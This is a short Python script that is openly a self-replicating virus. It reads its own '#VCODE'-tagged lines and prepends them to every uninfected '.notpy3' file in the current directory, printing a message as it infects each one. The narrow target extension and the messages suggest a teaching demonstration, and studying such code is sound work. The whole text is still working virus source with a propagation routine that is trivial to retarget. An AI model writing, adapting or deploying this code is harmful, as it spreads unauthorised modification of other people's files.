#!/usr/bin/python3
import os                                                               #VCODE
import sys                                                              #VCODE
                                                                        #VCODE
VCODE_MAGIC = "#VCODE"                                                  #VCODE
                                                                        #VCODE
# Get a list of all files in the current working directory.             #VCODE
dirs = os.listdir()                                                     #VCODE
                                                                        #VCODE
# Read ourself.                                                         #VCODE
virus = ""                                                              #VCODE
with open(sys.argv[0], "r") as fp:                                      #VCODE
    # Read a line, if it contains #VCODE add it to the virus.           #VCODE
    for line in fp:                                                     #VCODE
        if(line.find(VCODE_MAGIC) != -1):                               #VCODE
            virus += line                                               #VCODE
                                                                        #VCODE
# Iterate through each file/dir.                                        #VCODE
for entry in dirs:                                                      #VCODE
    # Do nothing if this is a directory.                                #VCODE
    if(os.path.isdir(entry)):                                           #VCODE
        continue                                                        #VCODE
                                                                        #VCODE
    # Do nothing if the file's extension isn't ".notpy3".               #VCODE
    if(os.path.splitext(entry)[1] != ".notpy3"):                        #VCODE
        continue                                                        #VCODE
                                                                        #VCODE
    # Read the victim script.                                           #VCODE
    with open(entry, "r") as fp:                                        #VCODE
        victim = fp.read()                                              #VCODE
                                                                        #VCODE
    # Do nothing if the victim is already infected.                     #VCODE
    if(victim.find(VCODE_MAGIC) != -1):                                 #VCODE
        print("Script {} is already infected...".format(entry))         #VCODE
        continue                                                        #VCODE
                                                                        #VCODE
    # Announce that we're infected the victim script.                   #VCODE
    print("Infecting {}!".format(entry))                                #VCODE
                                                                        #VCODE
    # Prepend virus script to victim script.                            #VCODE
    infected = "#!/usr/bin/python3\n" + virus + victim                  #VCODE
                                                                        #VCODE
    # Write infected victim script back.                                       #VCODE
    with open(entry, "w") as fp:                                        #VCODE
        fp.write(infected)                                              #VCODE
